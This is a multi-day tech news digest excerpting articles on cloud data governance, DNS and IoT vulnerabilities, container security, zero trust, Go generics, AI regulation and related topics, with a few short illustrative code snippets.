Daily Tech Digest - May 04, 2022

The cloud data migration challenge continues - why data governance is job one

How can governance help? The role of governance is to define the rules and policies for how individuals and groups access data properties and the kind of access they are allowed. Yet people in an organization rarely operate according to well-defined roles. They perform in multiple roles, often provisionally. On-ramping has to happen immediately; off-ramping has to be a centralized function. One very large organization we dealt with discovered that departing employees still had access to critical data for seven to nine days! So how can data governance support more intelligent data security? After all, without governance, security would be arbitrary. Many organizations that employ security schemes struggle because such schemes tend to be either too loose or too tight, and almost always too rigid (insufficiently dynamic). In this way, security can hinder the progress of the organization. Yet, given the complexity of data architecture today, it’s become impossible to manage security for individuals without a coherent and dynamic governance policy to drive security allowances or grants of exceptions to those rules.


Cybersecurity and the Pareto Principle: The future of zero-day preparedness

There’s a good reason why software asset inventory and management is the second-most important security control, according to the Center for Internet Security’s (CIS) Critical Security Controls. It’s “essential cyber hygiene” to know what software is running and to be able to access that up-to-date information instantaneously. It’s as though you were a new master-at-arms for a local baron in the Middle Ages. Your first duty would be to map out the castle grounds that you are charged to protect. ... As we put Log4Shell behind us, let’s incorporate these lessons learned for a more prepared future. The allocation of resources by enterprise security teams needs to be more purposeful, as attackers become increasingly sophisticated and continue to have what feels like unlimited resources. The value added through clear visibility and real-time insights into your entire ecosystem becomes all the more important. Remember, the core scope of the security team is to create a secure IT ecosystem, mitigate the exploitation of known vulnerabilities and monitor for any suspicious activity.


Expect to see more online data scraping, thanks to a misinterpreted court ruling

What can and should IT do about that? Given that these are generally publicly visible pages, it’s a problem. There are few technical methods to block scrapers that wouldn’t cause problems for the site visitors the enterprise wants. Years ago, I was managing a media outlet that was making a huge move to premium content, meaning that readers would now have to pay for selected premium stories. We ran into a problem. We couldn’t allow people to freely share premium content, as we needed people to buy those subscriptions. That meant that we blocked cut-and-paste and specifically blocked someone from saving the page as a PDF. But that meant that those pages also couldn’t be printed. (Saving as PDF is really printing to PDF, so blocking PDF downloads meant blocking all printers.) It took just a couple of hours before new premium subscribers screamed that they had paid for access and needed to be able to print pages and read them at home or on a train. After quite a few subscribers threatened to cancel their paid subscriptions, we surrendered and reinstated the ability to print.


Unpatched DNS Bug Puts Millions of Routers, IoT Devices at Risk

Researchers compared the bug’s reach to that of Log4Shell, the flaw in the ubiquitous open-source Apache Log4j framework found in countless Java apps used across the internet. In fact, a recent report found that Log4Shell continues to put millions of Java apps at risk, though a patch exists for the flaw. Though it affects a different set of targets, the DNS flaw also has a broad scope, not only because of the devices it potentially affects, but also because of the inherent importance of DNS to any device connecting over IP, researchers said. DNS is a hierarchical database that serves the integral purpose of translating a domain name into its related IP address. To distinguish the responses to different DNS requests, beyond the usual 5-tuple (source IP, source port, destination IP, destination port, protocol) and the query, each DNS request includes a parameter called the “transaction ID.” The transaction ID is a unique number per request that is generated by the client and added to each request sent. It must be included in a DNS response for the client to accept it as the valid one for that request, researchers noted. “Because of its relevance, DNS can be a valuable target for attackers,” they observed.
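The transaction-ID check described above can be sketched in a few lines of Go. This is a minimal, hypothetical client fragment (not the researchers' code, and the function names are my own): it builds the fixed 12-byte DNS query header with a cryptographically random transaction ID, then accepts a response only when the IDs match. A predictable transaction ID is exactly what lets an off-path attacker forge acceptable responses.

```go
package main

import (
	"crypto/rand"
	"encoding/binary"
	"fmt"
)

// newQueryHeader builds the fixed 12-byte DNS header for a standard
// query, using a cryptographically random transaction ID.
func newQueryHeader() ([]byte, uint16, error) {
	var idBytes [2]byte
	if _, err := rand.Read(idBytes[:]); err != nil {
		return nil, 0, err
	}
	id := binary.BigEndian.Uint16(idBytes[:])

	hdr := make([]byte, 12)
	binary.BigEndian.PutUint16(hdr[0:2], id)     // transaction ID
	binary.BigEndian.PutUint16(hdr[2:4], 0x0100) // flags: standard query, recursion desired
	binary.BigEndian.PutUint16(hdr[4:6], 1)      // QDCOUNT: one question follows
	return hdr, id, nil
}

// acceptResponse mimics the client-side check: a response is only
// valid if its transaction ID matches the one the client sent.
func acceptResponse(resp []byte, wantID uint16) bool {
	if len(resp) < 12 {
		return false
	}
	return binary.BigEndian.Uint16(resp[0:2]) == wantID
}

func main() {
	hdr, id, err := newQueryHeader()
	if err != nil {
		panic(err)
	}
	fmt.Printf("sent transaction ID %#04x; matching response accepted: %v\n",
		id, acceptResponse(hdr, id))
}
```

The vulnerability class the researchers describe arises when the ID is generated predictably (for example, incrementing or constant), which collapses the 16-bit guessing space for an attacker racing the legitimate resolver.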



Managed services vs. hosted services vs. cloud services: What's the difference?

Managed service providers (MSPs) existed first - before we were talking about the big public cloud providers. “I’ve seen some definitions where MSPs are a superset and all CSPs are MSPs, but not all MSPs are CSPs. That seems a reasonable definition to me,” says Miniman. One historical example of a managed service provider you may know is Rackspace: Their company name literally reflected that you were buying space in their rack to run workloads. The way their business started out was as a hosted service: Your server ran in Rackspace’s data center. But Rackspace also offered other types of services to customers - managed services. ... “When I think of a hosted environment, that is something dedicated to me,” says Miniman. “So traditionally, there was a physical machine…that maybe had a label on it. But definitely from a security standpoint, it was ‘company X is renting this machine that is dedicated to that environment.’” Public cloud service providers sell hundreds of services: You can think of those as standard tools, just like you’d find standard metric tools walking into any hardware store.


Making Agile Work in Asynchronous and Hybrid Environments

The ideal state for asynchronous teams is to remain aligned passively - or with little effort - eliminating the need for frequent meetings or lengthy documentation of the minutiae of every project. To pull this off, visual collaboration should be a key element of Agile management for teams that are working remotely and asynchronously. Visual collaboration brings the ease of alignment of the whiteboard into the digital workplace, giving developers a living artifact of project plans that can include diagrams, UX mockups, embedded videos, and other communication tools that can make async work nearly error-proof. Our team at Miro uses a variety of visual tools to manage our development, and many of these tools are available as free templates that other teams can use. The agile product roadmap helps prioritize work and shift tasks as priorities change. And the product launch board helps our team visually align design, development, and go-to-market (GTM) teams as we come down to the wire on a new launch. The shared nature of these tools gives us confidence as we work.

Three steps to an effective data management and compliance strategy

Businesses clearly need to know more about their data to meet compliance needs, but the challenge is sorting through the noise in all the volume. Data analytics is essential for enterprises looking to increase efficiency, improve business decision-making and attain that important competitive edge while still ensuring that they comply with today’s data standards. However, while big data can add significant value to the decision-making process, supporting large volumes of unstructured data can be complex, as inadequate data management and data protection introduce unacceptable levels of risk. The emergence of DataOps, which is an automated and process-oriented methodology aimed at improving the quality of data analytics, further supports the requirement for enhanced data management. Driving faster and more comprehensive analytics is key to leveraging value from data, but this can only be done if data is managed correctly, the right governance protocols are in place, and data quality is kept to the highest standard.


5 key industries in need of IoT security

The growth of IoT has spurred a rush to deploy billions of devices worldwide. Companies across key industries have amassed vast fleets of connected devices, creating gaps in security. Today, IoT security is overlooked in many areas. For example, a sizable percentage of devices share the userID and password of “admin/admin” because their default settings are never changed. The reason security has become an afterthought is that most devices are invisible to organizations. Hospitals, casinos, airports, cities, etc. simply have no way of seeing every device on their networks. ... Cities rely on 1.1 billion IoT devices for physical security, operating critical infrastructure such as traffic control systems, street lights, subways, emergency response systems and more. Any breach or failure in these devices could pose a threat to citizens. You see it in the movies: brilliant hackers control the traffic lights across a city, with perfect timing, to guide an armored vehicle into a trap. Then there’s real life; for instance, when a hacker in Romania took control of outdoor video cameras in Washington, DC, days before the Trump inauguration.


Getting strategy wrong—and how to do it right instead

Making matters more complex, especially in areas of public policy and defense, real-life leaders do not have a neat economist’s single measure of value. Instead, they are faced with a bundle of conflicting ambitions—a group of desires, goals, intents, values, and fears—that cannot all be satisfied simultaneously. Forging a sense of purpose from this bundle is part of the gnarly problem. Making matters most complex is the fact that the connection between potential actions and actual outcomes is unclear. A gnarly challenge is not solved with analysis or the application of preset frameworks. A coherent response arises only through a process of diagnosing the nature of the challenges, framing, reframing, chunking down the scope of attention, referring to analogies, and developing insight. The result is a design, or creation, embodying purpose. I call it a creation because it is often not obvious at the start, the product of insight and judgment rather than an algorithm. Implicit in the concept of insightful design is that knowledge, though required, is not, by itself, sufficient.


Understand the 3 P’s of Cloud Native Security

The movement to shift security left has empowered developers to find and fix defects early so that when the application is pushed into production, it is as free as possible from known vulnerabilities at that time… But shifting security left is just the beginning. Vulnerabilities arise in software components that are already deployed and running. Organizations need a comprehensive approach that spans left and right, from development through production. While there’s no formulaic one-size-fits-all way to achieve end-to-end security, there are some worthwhile strategies that can help you get there. ... Shifting left can help organizations develop applications with security in mind. But no matter how confident you are in the security of an application when it leaves development, there is no guarantee that it will remain secure in production. We have seen on a large scale that vulnerabilities are often disclosed well after being deployed to production. Reminders include Apache Struts, Heartbleed and, most recently, Log4Shell, the Log4j flaw whose vulnerable code was first published in 2013 but which was discovered just last year.




Quote for the day:

"Leaders are more powerful role models when they learn than when they teach." -- Rosabeth Moss Kanter

Daily Tech Digest - May 03, 2022

5 Elements of High-Quality Software

The software architecture initially puts a foundation under a software project and lets programmers work on that project for many years. The entire software system’s lifetime, maintainability, and market success depend on this foundation. Late architectural changes are usually time-consuming and costly for any software development team. In other words, it’s practically impossible to change the foundation once a house is built on top of it. Therefore, we always need to strive to select the optimal architectural pattern with the first implementation attempt. It’s indeed better to spend more time on early architectural decisions than to spend your time fixing the side effects of hasty, non-optimal architectural decisions. First, work on the software system’s core functionality and stabilize it — at this stage, architectural changes are not very time-consuming. Next, work on features by using the software core’s functionality. Even though you use a monolithic pattern, you can detach the core logic from features at the source-code level — if not at the architectural level.
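Detaching core logic from features at the source-code level, even inside a monolith, usually comes down to an interface seam: the core depends on an abstraction, and features plug into it. The sketch below is a minimal illustration under that assumption; all names (Core, Notifier, EmailNotifier, PlaceOrder) are hypothetical, not taken from the article.

```go
package main

import "fmt"

// Notifier is the seam between core and feature code: the core depends
// only on this interface, never on a concrete feature implementation.
type Notifier interface {
	Notify(userID, msg string)
}

// Core holds the stable business rules; features are injected at
// startup rather than imported directly by the core.
type Core struct{ notifier Notifier }

// PlaceOrder runs a (stubbed) business rule, then delegates the
// feature-level concern of notification through the interface.
func (c *Core) PlaceOrder(userID string) string {
	c.notifier.Notify(userID, "order placed")
	return "order placed for " + userID
}

// EmailNotifier is one replaceable feature; swapping in SMS or push
// notifications requires no change to the core type above.
type EmailNotifier struct{}

func (EmailNotifier) Notify(userID, msg string) {
	fmt.Printf("email to %s: %s\n", userID, msg)
}

func main() {
	core := &Core{notifier: EmailNotifier{}}
	fmt.Println(core.PlaceOrder("u42"))
}
```

The point of the seam is exactly the one the excerpt makes: when a later architectural change does become necessary (say, splitting notifications into a separate service), the core code is already isolated from the feature it would affect.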


SSE kicks the ‘A’ out of SASE

Now comes security service edge (SSE), which pulls back the security functions in SASE into a unified services offering that includes CASB, zero-trust network architecture (ZTNA) and secure web gateway (SWG). SSE came in the wake of the COVID-19 pandemic, with most employees being sent home to work and putting in motion the ongoing trend toward hybrid work. With many people working from home at least part of the time, the role of branch offices is lessened and the need for security features that follow workers where they are – with work days starting from home and then moving to offices or other locations – is growing. What the role of SSE is in the larger network security space, and what it means for the future of SASE, are the subjects of some debate in the industry. However, it puts a spotlight on the ongoing evolution of networking as the definition of work continues to change and the focus of IT shifts from the traditional central data center to data and workloads in the cloud and at the edge. Once the pandemic hit, "it was no longer about branch offices," said John Spiegel, director of strategy at Axis Security, which in April launched Atmos, its SSE platform.


What Is Zero Trust Network Access (ZTNA)?

To begin, the idea behind zero trust network access starts with the assumption that cybersecurity attacks can come from actors both internal and external to the network. A traditional IT network trusts pretty much everything, while a zero trust architecture literally means “trust no one,” including systems, users, software, and machines. Zero trust network access verifies a user’s identity and privileges and forces both users and devices to be continuously monitored and re-verified to maintain access. For example, let’s say that you log in to your bank account via a mobile device or even your laptop computer. Once you check your balance, you open a new tab to continue something else outside of the bank account screen. After a while, that tab will produce a pop-up with a timeout warning asking if you want to continue or log out. If you don’t reply in time, it will automatically log you out, and you will be forced to log back in if you want to access your bank account details again.


Determining “nonnegotiables” in the new hybrid era of work

Skill development is another function that takes place at the group level. So, in the hybrid era, it’s also important to avoid losing those opportunities. As Degreed’s Chief Learning and Talent Officer Kelly Palmer wrote for the World Economic Forum, it’s helpful to use hybrid employees’ time at the office for “collaborative projects in which their new skills can be put to work,” while “fully remote companies can organize virtual collaborations.” Prioritizing development on both the individual and team levels is also a nonnegotiable because of the challenges presented to organizations by skill gaps. “Half of all employees around the world will need reskilling by 2025—and that number does not include all the people who are currently not in employment,” PwC Global Chairman Robert E. Moritz and World Economic Forum Managing Director Saadia Zahidi wrote in the 2021 report Upskilling for Shared Prosperity.


Things that will remain in the inkwell in the new European regulation of artificial intelligence

The European Union took a step forward and a year ago presented a proposal for a pioneering regulation, the first of its kind in the world, which divides AI technologies into four categories based on the risk they may pose to citizens. But some experts point out that there are complex applications that, under the current wording, could be left out of regulation: health, autonomous cars and weapons, among others. The EU is debating the final details of the AI regulations, which could be ready in 2023. It is a regulation that is “unique in the world” due to its characteristics, although it leaves important aspects in the shadows, says Lucía Ortiz de Zárate, researcher in Ethics and Governance of Artificial Intelligence at the Autonomous University of Madrid. Ortiz de Zárate has submitted, together with the Fundación Alternativas, comments on the Commission’s proposal. ... The researcher regrets that some sensitive sectors, such as health, are not included in the most closely watched artificial intelligence classifications.


How To Re-Architect Four Business Components With Digital Transformation

Going paperless and modernizing IT won't drive digital transformation on their own. On the contrary, true digital transformations encompass reevaluating current business processes and re-architecting them from the ground up to effectuate radical change. The key to successful digital transformation is to establish and seamlessly intertwine four core pillars: technology and infrastructure, business processes and models, customer experience and organizational culture. In my experience as an entrepreneur operating a digital transformation agency, high-performing organizations and digital leaders are able to continuously re-evaluate their core, identify weaknesses and opportunities and guide their teams through the ongoing transformation of all four pillars simultaneously to achieve defined goals. Whether it's an implementation of AI-driven analytics or a new customer portal, all components of the four pillars need to be considered and transformed in unison to achieve transformation goals and deliver tangible results. Initiatives that touch only the technology or infrastructure may drive improvement, but they're rarely transformative.


Deep Dive: Protecting Against Container Threats in the Cloud

Container technology, like other types of infrastructure, can be compromised in a number of different ways – however, misconfiguration reigns atop the initial-access leaderboard. According to a recent Gartner analysis, through 2025, more than 99 percent of cloud breaches will have a root cause of customer misconfigurations or mistakes. “Containers are often deployed in sets and in very dynamic environments,” Nunnikhoven explained. “The misconfiguration of access, networking and other settings can lead to an opportunity for cybercriminals.” Trevor Morgan, product manager at comforte AG, noted that companies, especially smaller companies, are generally using default configuration settings vs. more sophisticated and granular configuration capabilities: “Basic misconfigurations or accepting default settings that are far less secure than customized settings.” That can lead to big (and expensive) problems. For instance, last June the “Siloscape” malware was discovered, which is the first known malware to target Windows containers. It breaks out of Kubernetes clusters to plant backdoors, raid nodes for credentials or even hijack an entire database hosted in a cluster.
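A first line of defense against the accept-the-defaults problem is simply auditing container settings for known-insecure values. The sketch below uses a simplified, hypothetical config struct and finding names of my own invention; a real audit would read these fields from Kubernetes manifests or runtime inspection rather than a hand-built struct.

```go
package main

import "fmt"

// containerConfig is a simplified, hypothetical view of a container's
// security-relevant settings.
type containerConfig struct {
	Name        string
	Privileged  bool // full host access: almost never needed
	RunAsRoot   bool // root in the container widens blast radius
	HostNetwork bool // shares the host's network namespace
}

// audit returns the insecure settings found, the kind of defaults the
// article warns are accepted far too often.
func audit(c containerConfig) []string {
	var findings []string
	if c.Privileged {
		findings = append(findings, "privileged mode enabled")
	}
	if c.RunAsRoot {
		findings = append(findings, "runs as root")
	}
	if c.HostNetwork {
		findings = append(findings, "shares host network namespace")
	}
	return findings
}

func main() {
	c := containerConfig{Name: "web", Privileged: true, RunAsRoot: true}
	for _, f := range audit(c) {
		fmt.Println(c.Name+":", f)
	}
}
```

Checks like these are exactly what admission controllers and policy engines automate at scale; the value is running them before deployment, when a finding is a one-line fix rather than an incident.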


DAOs: A blockchain-based replacement for traditional crowdfunding

Digital crowdfunding platforms like GoFundMe, Patreon and Kickstarter have enjoyed massive patronage over the past 10 years. This growth can be attributed primarily to the nature of crowdfunding, which is set up with minimal risk. This risk is spread across all contributors to a particular idea or startup. Startups with financial needs will find that getting funding from traditional institutions is no easy feat. These institutions take on quite a lot of the risk involved in financing business ideas that could end badly. With a global economy still reeling from the pandemic, the accessibility and much less bureaucratic nature of DAOs as a tool for crowdfunding have been a primary factor in their growth. Digitalized crowdfunding in the form of DAOs has eliminated some traditional limits of the financing form. The simplicity makes it a disruptive force to traditional crowdfunding methods. Emmet Halm dropped out of Harvard to found DAOHQ, which bills itself as the first marketplace for DAOs where users can find information about any DAO.


A regular person’s guide to the mind-blowing world of hybrid quantum computing

Quantum computers allow us to harness the power of entanglement. Instead of waiting for one command to execute, as binary computers do, quantum computers can come to all of their conclusions at once. In essence, they’re able to come up with (nearly) all the possible answers at the same time. The main benefit to this is time. A simulation or optimization task that might take a supercomputer a month to process could be completed in mere seconds on a quantum computer. The most commonly cited example of this is drug discovery. In order to create new drugs, scientists have to study their chemical interactions. It’s a lot like looking for a needle in a never-ending field of haystacks. There are near-infinite possible chemical combinations in the universe, and sorting out their individual combined chemical reactions is a task no supercomputer can do within a useful amount of time. Quantum computing promises to accelerate these kinds of tasks and make previously impossible computations commonplace. But it takes more than just expensive, cutting-edge hardware to produce these ultra-fast outputs.


Go Language Riding High with Devs, But Has a Few Challenges

Among the most significant technical barriers to increased Go language adoption are missing features and lack of ecosystem/library support. “We asked for more details on what features or libraries respondents were missing and found that generics was the most common critical missing feature — we expect this to be a less significant barrier after the introduction of generics in Go 1.18,” wrote Alice Merrick, a user experience researcher at Google, in a post on the Go Blog discussing the 2021 survey. “The next most common missing features had to do with Go’s type system.” The Go community added generics in release 1.18 of the language. Release 1.18, delivered last month, provides new features to enhance security and developer productivity, and improves the performance of Go. Steve Francia, Google Cloud’s Product & Strategic Lead for Go, called the new update “monumental” and said generics was the most sought-after feature among developers. “With generics, this specific feature has been the most sought-after feature in go for the last 10 years,” Francia said.
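For readers who have not yet seen the Go 1.18 syntax, here is a small example of what generics look like in practice. The Sum function is written for illustration; it is not taken from the survey or the release notes.

```go
package main

import "fmt"

// Number constrains the type parameter to a few numeric types; the ~
// means "any type whose underlying type is" int, int64, or float64.
type Number interface {
	~int | ~int64 | ~float64
}

// Sum works for any slice whose element type satisfies Number. Before
// Go 1.18 this required one copy per type, code generation, or
// interface{} with runtime type assertions.
func Sum[T Number](xs []T) T {
	var total T
	for _, x := range xs {
		total += x
	}
	return total
}

func main() {
	fmt.Println(Sum([]int{1, 2, 3}))           // prints 6
	fmt.Println(Sum([]float64{0.5, 1.5, 2.0})) // prints 4
}
```

The type parameter is inferred from the argument at each call site, so callers get type-safe reuse without writing the bracketed type explicitly.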



Quote for the day:

"It takes an influential leader to excellently raise up leaders of influence." -- Anyaele Sam Chiyson

Daily Tech Digest - May 02, 2022

The Time Travel Method of Debugging Software

By removing the preconceived notions about how challenging programming is, Jason Laster became more confident in building a developer-friendly debug tool. “We want to make software more approachable,” he said. “We want more people to feel like they can program and do things that don’t require a math degree.” He went on to say, “Imagine being a Project Manager and asking your engineer why something broke and receiving a long explanation that still leaves your question unanswered. Using Replay, they can share the URL with the engineers who can just go in and leave a comment. Now, the PM can recognize the function and identify what went wrong on their own. If anybody along the way can record the issue with Replay, then everyone downstream can look at the replay, debug it and see exactly what went wrong.” Acknowledging that it’s easy to mistake Replay for another browser recorder tool, Laster explained how Replay differs. “On one end of the spectrum, you have something like a video recorder, then go along that spectrum a little bit further and you have something like a session replay tool and observability tool.


Software AI Accelerators: AI Performance Boost for Free

The increasing diversity of AI workloads has necessitated a business demand for a variety of AI-optimized hardware architectures. These can be classified into three main categories: AI-accelerated CPU, AI-accelerated GPU, and dedicated hardware AI accelerators. We see multiple examples of all three of these hardware categories in the market today, for example Intel Xeon CPUs with DL Boost, Apple CPUs with Neural Engine, Nvidia GPUs with tensor cores, Google TPUs, AWS Inferentia, Habana Gaudi and many others that are under development by a combination of traditional hardware companies, cloud service providers, and AI startups. While AI hardware has continued to take tremendous strides, the growth rate of AI model complexity far outstrips hardware advancements. About three years ago, a Natural Language AI model like ELMo had ‘just’ 94 million parameters whereas this year, the largest models reached over 1 trillion parameters. 


Cybersecurity in the digital factory for manufacturers

Many companies are extremely hesitant about introducing the Industrial Internet of Things (IIoT) or cloud systems because they believe it will open the door to cybercriminals. What they fail to realize is they’re already facing this danger every day. A simple email with an attachment or a link can result in the encryption of all the information on a server. You’re at risk even if you haven’t implemented an entire ecosystem connecting customers and suppliers. That’s why it’s essential that you’re aware of the threats and be ready to respond quickly in the event of a cyberattack. Cybersecurity is currently on everyone’s lips. In many widely publicized cases, large companies have fallen victim to cyberattacks that compromised their operations in one way or another. In some of these cases, the companies’ security policies had not kept up with the past decade’s rapid changes in the use of digital technologies and tools. They mistakenly thought a cyberattack could only affect others. The sheet metal processing sector is no exception to this reality.


Chaos Engineering and Observability with Visual Metaphors

Monitoring and observability have become essential capabilities for engineering teams and, in general, for modern digital enterprises that want to deliver excellence in their solutions. Since there are many reasons to monitor and observe systems, Google has documented the Four Golden Signals: metrics that define what it means for a system to be healthy and that are the foundation for the current state of observability and monitoring platforms. The first two metrics are described below: Latency is the time that a service takes to serve a request. It is important to include failed requests, such as HTTP 500 errors triggered by a lost connection to a database or other critical backend, even though they might be served very quickly. Latency is a basic metric, since a slow error is even worse than a fast error. Traffic is a measure of how much demand is being placed on the system. It determines how much stress the system is taking at a given time from users or transactions running through the service. For a web service, for example, this measurement is usually HTTP requests per second.


Reimagining the Post Pandemic Future: Leveraging the benefits of Hyperautomation

As the world emerges from the impact of the pandemic, hyperautomation solutions will power digital self-services to take center stage, connecting businesses with customers. With customers opening bank accounts remotely, consulting doctors online, interacting with governments via citizen self-serve, and so on, the scope of tech-enabled services keeps expanding over time. All this implies that there will be a gradual shift away from the traditional back-office towards self-serve. From a hyperautomation standpoint, this shift will see a considerable boost from low-code platforms with favorable B2C type interactions. Rich and sophisticated user experiences centered around simplicity and ease of use will be in demand. New user experiences will break ground allowing more flexibility and improved speed-to-solution. In addition to B2C type low-code portals, Artificial Intelligence (AI) and analytics will be in demand. For example, organizations will deploy AI technologies heavily to assist customer interactions.


UK regulators seek input on algorithmic processing and auditing

On the benefits and harms of algorithms, the DRCF identified “six cross-cutting focus areas” for its work going forward: transparency of processing; fairness for those affected; access to information products, services and rights; resilience of infrastructure and systems; individual autonomy for informed decision-making; and healthy competition to promote innovation and better consumer outcomes. On algorithmic auditing, the DRCF said the stakeholders pointed to a number of issues in the current landscape: “First, they suggested that there is lack of effective governance in the auditing ecosystem, including a lack of clarity around the standards that auditors should be auditing against and around what good auditing and outcomes look like. “Second, they told us that it was difficult for some auditors, such as academics or civil society bodies, to access algorithmic systems to scrutinise them effectively. Third, they highlighted that there were insufficient avenues for those impacted by algorithmic processing to seek redress, and that it was important for regulators to ensure action is taken to remedy harms that have been surfaced by audits.”


Developer experience doesn’t have to stop at the front end

“It is natural to see providers making it easier for developers to do those things and that is where we get into infrastructure meeting software development,” RedMonk analyst James Governor told InfoWorld. “At the end of the day, you need platforms to enable you to be more productive without manually dealing with Helm charts, operators, or YAML.” Improving the back-end developer experience can do more than improve the lives of back-end developers. Providing better, more intuitive tools can enable back-end developers to get more done, while also bringing down barriers to allow a wider cohort of developers to manage their own infrastructure through thoughtful abstractions. “Developer control over infrastructure isn’t an all-or-nothing proposition,” Gartner analyst Lydia Leong wrote. “Responsibility can be divided across the application lifecycle, so that you can get benefits from “you build it, you run it” without necessarily parachuting your developers into an untamed and unknown wilderness and wishing them luck in surviving because it’s not an ‘infrastructure and operations team problem’ anymore.”


As supply chains tighten, logistics must optimize with AI

Before jumping the gun, identify your bottlenecks, understand the delivery systems available and discover the root cause of the congestion. Factors to analyze are the capacity of your shipping mediums, your warehouse management, average delivery time and the accuracy of your demand predictions. Only by understanding your current capabilities and inefficiencies will you be able to deploy the appropriate technology. Build your systems in an orderly manner: Build out your technology step by step. This is vital since some companies assume that adding multiple solutions and automating everything at once will reap the best results. This is not the case. ... Overall, applying AI analytics to problems will help you optimize elements like your optimal warehouse capacity, transportation utilization and delivery times. At some point, however, business leaders have to choose between tradeoffs. Is the main goal to keep costs low or to increase delivery speed? Are long transport distances to be avoided due to emissions? While AI can show which alternatives are more cost-effective or climate-friendly, companies will have to make the ultimate decision about their business trajectory.


SOC modernization: 8 key considerations

When an asset is under attack, security analysts need to understand if it is a test/development server or a cloud-based workload hosting a business-critical application. To get this perspective, SOC modernization combines threat, vulnerability, and business context data for analysts. ... Cisco purchased Kenna Security for risk-based vulnerability management, Mandiant grabbed Intrigue for attack surface management, and Palo Alto gobbled up Expanse Networks for ASM as well. Meanwhile, SIEM leader Splunk provides risk-based alerting to help analysts prioritize response and remediation actions. SOC modernization makes this blend a requirement. ... SOC modernization includes a commitment to constant improvement. This means understanding threat actor behavior, validating that security defenses can counteract modern attacks, and then reinforcing any defensive gaps that arise. CISOs are moving toward continuous red teaming and purple teaming for this very purpose. In this way, SOC modernization will drive demand for continuous testing and attack path management tools from vendors like AttackIQ, Cymulate, Randori, SafeBreach, and XMCyber.


Challenging misconceptions around a developer career

Experience counts a lot for developers, just as it does for pilots or surgeons. Technical experience is relatively easy to pick up, but the experiences that build instinct in the best developers are rarely gained alone. Developers work with others and learn from one another along the way. They seek collaboration on difficult problems and offer thoughtful feedback and suggestions on work in progress. Ultimately, developer tools are built for collaboration, encouraging the exchange of comments and open discussion. There are so many misconceptions about successful developers. Some of them may have some truth to them, while others are outdated or were completely false in the first place. The idea of developers as antisocial individuals is not always accurate. Developers are more often creative problem solvers who combine creativity with deep skills to tackle the task at hand. The most successful developers combine emotional intelligence with hard work and a curiosity for learning something new – and they help others around them to do the same.




Quote for the day:

"Without courage, it doesn't matter how good the leader's intentions are." -- Orrin Woodward

Daily Tech Digest - May 01, 2022

The metaverse is a transformational opportunity for the business world

The idea of the metaverse gives enterprise software developers a roadmap to build software based on a single digital identity where companies join a network to connect with other companies who have likewise joined. This is not a system that belongs to any one company, but an environment where all companies are equal. Why do businesses want to connect? Because that’s the nature of a business at its essence, connecting with customers, suppliers, and any stakeholder to establish an expectation of value from the relationship, and then measure the realization of this value over time. This thinking is not inconsistent with the idea of a VR environment where a business user engages with some part of their business in an immersive environment. But we are setting the aperture much wider to say the entire business should be thought of as being part of the metaverse, and all of the data that exists about that business can be aimed at that digital identity to create a digital twin for the entire business. Then this digital business can connect with other businesses to do what businesses do — exchange value — but is now supported by a persistent, interoperable, collaborative digital space that is co-created and co-owned by those companies who have joined the metaverse.


Cognitive Biases About Leadership and How to Survive Them

We develop cognitive biases based on our life experience. Just as we expect teachers to be good with kids and surgeons to have a steady hand, we also hold behavioral expectations for our leaders. Today’s emphasis on servant leadership has us all believing that leaders are heroes, existing to serve the people and their every action should be a selfless gesture. Then, when they fail to act in accordance with our beliefs, we become disillusioned — the hero has fallen and everything they ever did, good or bad, gets lumped into one big giant disappointment. That’s a lot of burden for a leader to bear. Instead of looking at leaders as one whole unit, we need to see them as a collection of basic human traits. We forget that within every leader is a person, with flaws and imperfections. Instead of putting the whole person on a pedestal as some kind of one-size-fits-all embodiment of goodness, just admire them for their strengths. Unpack what you like about them without discarding the whole leader. Take the good they accomplished for what it is, but don’t blame humans for not being angels.
 

Data Is The New Business Fuel, But It Requires Sound Risk Management

Today’s remote or hybrid work model poses a whole new set of security challenges. Many companies can minimize risk by leveraging a multicloud strategy, but the risk associated with malware or ransomware can compromise crucial corporate and customer data. Despite this, according to a report from Menlo Security, only 27% of organizations have advanced threat protection in place for all endpoint devices with access to company data. It’s crucial that companies deploy advanced cybersecurity software and also train employees on acceptable use of public or home-based Wi-Fi. While enterprise data provides the fuel that drives accurate AI, it’s important that data scientists ensure that bias doesn’t creep into the algorithms that are developed. Data should be analyzed to ensure that it is diverse and doesn’t lead to any decisions that could provide an unfair advantage to certain populations. As an example, AI that helps to determine the best suppliers to work with should be trained with diverse supplier data. Speaking of suppliers, it’s not enough that data has proper governance within the organization. 


How Aurora Serverless made the database server obsolete

Amazon Aurora Serverless v1 changed everything by enabling customers to resize their VMs without disrupting the database. It would look for gaps in transaction flows that would give it time to resize the VM. It would then freeze the database, move to a different VM behind the scenes, and then start the database again. This was a great starting point, explains Biswas, but finding transaction gaps isn't always easy. "When we have a very chatty database, we are running a bunch of concurrent transactions that overlap," he explains. "If there's no gap between them, then we can't find the point where we can scale." Consequently, the scaling process could take between five and 50 seconds to complete. It could sometimes end up disrupting the database if an appropriate transaction gap could not be found. That restricted Aurora Serverless instances to sporadic, infrequent workloads. "One piece of feedback that we heard from customers was that they wanted us to make Aurora Serverless databases suitable for their most demanding, most critical workloads," explained Biswas.
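The "transaction gap" search described above can be illustrated with a small sketch: given the intervals during which transactions are active, find a moment when nothing is running so the database can be frozen and moved. This is an invented simplification, not Aurora's actual implementation.

```python
def find_scaling_gap(transactions, min_gap):
    """transactions: (start, end) pairs of active transactions.
    Returns the earliest moment with no transaction running for at
    least min_gap; on a chatty, fully overlapping workload this only
    happens after the last transaction ends, which is why scaling
    could be slow or disruptive."""
    cursor = 0.0
    for start, end in sorted(transactions):
        if start - cursor >= min_gap:
            return cursor          # found an idle window mid-stream
        cursor = max(cursor, end)  # overlapping work pushes the cursor forward
    return cursor                  # only idle once everything has finished

# Two overlapping transactions followed by a short pause before a third:
gap = find_scaling_gap([(0.0, 2.0), (1.5, 4.0), (4.2, 6.0)], min_gap=0.1)
```

Here the first usable pause starts at time 4.0, after the overlapping pair completes; with no pause at all, the scaler would have to wait for the whole stream to drain.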


The ever-expanding cloud continues to storm the IT universe

